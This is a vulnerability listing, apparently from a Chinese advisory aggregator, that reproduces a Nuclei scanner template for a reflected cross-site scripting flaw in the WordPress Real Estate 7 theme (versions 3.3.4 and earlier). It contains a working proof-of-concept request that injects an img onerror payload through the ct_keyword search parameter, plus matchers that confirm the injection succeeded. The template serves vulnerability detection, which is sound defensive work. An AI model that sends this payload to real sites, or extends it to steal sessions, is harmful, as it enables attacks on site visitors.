wp-real-estate-xss: WordPress Real Estate 7 Theme <= 3.3.4 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress Real Estate 7 | POC: 已公开

漏洞描述

The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.

PoC代码[已公开]

id: wp-real-estate-xss

info:
  name: WordPress Real Estate 7 Theme <= 3.3.4 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39344
    - https://packetstormsecurity.com/files/171186/WordPress-Real-Estate-7-Theme-3.3.4-Cross-Site-Scripting.html
    - https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
    cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/themes/realestate-7/"
    product: real_estate_7
    vendor: contempothemes
  tags: packetstorm,wordpress,wp-theme,wp,xss,realestate,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<img src=x onerror=prompt(document.domain)>")'
          - 'contains(body, "/wp-content/themes/realestate-7/")'
        condition: and
# digest: 490a0046304402200e13832f56a5ad7c5f60bc8b1aa64cb3254ad3fd2b70982fbce6815d4677991102201bd13205f6f5f4f05c9594be9ce8d5dac3d90fc793b85c9608ba0fe4e07d5299:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml

相关漏洞推荐